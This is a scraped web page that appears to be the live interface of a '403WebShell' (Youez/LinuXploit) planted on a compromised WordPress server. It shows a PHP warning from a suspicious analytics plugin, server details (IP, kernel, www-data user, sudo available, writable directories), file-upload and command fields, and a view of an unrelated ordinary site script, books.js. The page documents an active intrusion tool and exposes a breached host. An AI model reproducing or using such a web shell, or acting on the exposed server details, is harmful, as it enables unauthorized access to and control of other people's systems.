Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/hopeinstoughton_books/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hopeinstoughton_books/inc/books.js
var ns4 = (document.layers) ? 1 : 0;
var ie4 = (document.all) ? 1 : 0;
var std = (document.getElementById) ? 1 : 0;
var ns6 = std && !ie4;
var delayhide=0;
var $ = jQuery.noConflict();

jQuery.cachedScript = function( url, options ) {
  options = jQuery.extend( options || {}, {
    dataType: 'script',
    cache: true,
    url: url
  });
  return jQuery.ajax( options );
};

function antispam(domain, user) {
	document.write('<a href="mailto:' + user + '@' + domain + '" class="link">' + user + '@' + domain + '</a>');
}

function addLoadEvent(func) {
	var oldOnload = window.onload;
	if (typeof window.onload != 'function') {
		window.onload = func;
	} else {
		window.onload = function() {
			oldOnload();
			func();
		}
	}
}

function MM_findObj(n) {
	var m = $('#' + n);
	if (m) m = m.get(0);
	return m;
}

function loadContent(file) {
	$.getScript(file);
}
function hide_popup() {
  winobj = MM_findObj('popwin');
  winobj.thestyle = (winobj.style) ?  winobj.style : winobj;
  winobj.thestyle.visibility="hidden";
  return false;
}

function show_popup(link, winname) {
  var d;  
  if (!winname) winname = 'popwin';
  var winobj = MM_findObj(winname);
  
  if (!winobj) return true;			// process link normally
  if (link.target) {
    d = link.target;
  } else {
    d = link.srcElement;
  }
  return showpopup2(winobj, d);
}
 
function showpopup2(winobj, d) {	// d = element
  winobj.thestyle = (winobj.style) ?  winobj.style : winobj;
  winobj.contentwidth=(ie4||ns6) ? winobj.offsetWidth : winobj.document.gui.document.width;
  winobj.contentheight=(ie4||ns6) ? winobj.offsetHeight : winobj.document.gui.document.height;
  if (ns4) {
      x = d.x; 
      y = d.y + d.height + top.pageYOffset;
  } else if (std) {
      x=d.offsetLeft; 
      y=d.offsetTop + d.offsetHeight;
      while (d.offsetParent) {
        d = d.offsetParent;
        x += parseInt(d.offsetLeft);
        y += parseInt(d.offsetTop);
      }
  } else {
      d = window.event.srcElement;
      x=d.offsetLeft; 
      y=d.offsetTop + d.offsetHeight;
      while (d.offsetParent) {
        d = d.offsetParent;
        x += parseInt(d.offsetLeft);
        y += parseInt(d.offsetTop);
      }
  }

  x -= winobj.contentwidth - 40;
  if (navigator.appName=="Netscape" && parseInt(navigator.appVersion)>4) {
    x += "px"; y += "px";
  }
  if (navigator.appVersion.indexOf("MSIE 5")>-1 && navigator.appVersion.indexOf("Mac")>-1) {
    x += parseInt(document.body.leftMargin); x += "px";
    y += parseInt(document.body.topMargin); y += "px";
  }

  winobj.thestyle.left = x;
  winobj.thestyle.top = y;
  winobj.thestyle.visibility="visible";
  return false;
}

function CurrencyFormatted(amount) {
	var i = parseFloat(amount);
	if (isNaN(i)) { i = 0.00; }
	var minus = '';
	if (i < 0) { minus = '-'; }
	i = Math.abs(i);
	i = parseInt((i + .005) * 100);
	i = i / 100;
	s = new String(i);
	if (s.indexOf('.') < 0) { s += '.00'; }
	if (s.indexOf('.') == (s.length - 2)) { s += '0'; }
	return minus + s;
}

function generate_window(name) {
  if (!ns4 && !ns4 && !std) return;
  document.write('<div id="' + name + '" class="menuskin"><iframe src="about:blank" width="410" height="225" frameborder="0" id="dest"></iframe></div>');
}

function log(text) {
	if (console.log) {
		console.log(text);
	}
}

function queueNoty(fn) {
	if (typeof noty_queue == 'undefined') noty_queue = [];
	if (typeof noty_loaded != 'undefined' && noty_loaded) {
		fn();
	} else {
		noty_queue.push(fn);
	}
};

$(function() {
	noty_loaded = (typeof noty == 'function');
	if (!noty_loaded) {
		$.cachedScript('/inc/jquery.noty.packaged.min.js' ).done(function( script, textStatus ) {
			noty_loaded = true;
			if (typeof noty_queue == 'undefined') noty_queue = [];
			while (noty_queue.length > 0) {
				noty_queue.pop()();
			}
		}).fail(function() {
			console.log( "unable to load noty.js. possible javascript error?" );
		}); 
	}
	
});

//////////////////////////////////////////////////
// parseUri 1.2.2
// (c) Steven Levithan <stevenlevithan.com>
// MIT License

function parseUri (str) {
	var	o   = parseUri.options,
		m   = o.parser[o.strictMode ? "strict" : "loose"].exec(str),
		uri = {},
		i   = 14;

	while (i--) uri[o.key[i]] = m[i] || "";

	uri[o.q.name] = {};
	uri[o.key[12]].replace(o.q.parser, function ($0, $1, $2) {
		if ($1) uri[o.q.name][$1] = $2;
	});

	return uri;
};

parseUri.options = {
	strictMode: false,
	key: ["source","protocol","authority","userInfo","user","password","host","port","relative","path","directory","file","query","anchor"],
	q:   {
		name:   "queryKey",
		parser: /(?:^|&)([^&=]*)=?([^&]*)/g
	},
	parser: {
		strict: /^(?:([^:\/?#]+):)?(?:\/\/((?:(([^:@]*)(?::([^:@]*))?)?@)?([^:\/?#]*)(?::(\d*))?))?((((?:[^?#\/]*\/)*)([^?#]*))(?:\?([^#]*))?(?:#(.*))?)/,
		loose:  /^(?:(?![^:@]+:[^:@\/]*@)([^:\/?#.]+):)?(?:\/\/)?((?:(([^:@]*)(?::([^:@]*))?)?@)?([^:\/?#]*)(?::(\d*))?)(((\/(?:[^?#](?![^?#\/]*\.[^?#\/.]+(?:[?#]|$)))*\/?)?([^?#\/]*))(?:\?([^#]*))?(?:#(.*))?)/
	}
};
//////////////////////////////////////////////////




Youez - 2016 - github.com/yon3zu
LinuXploit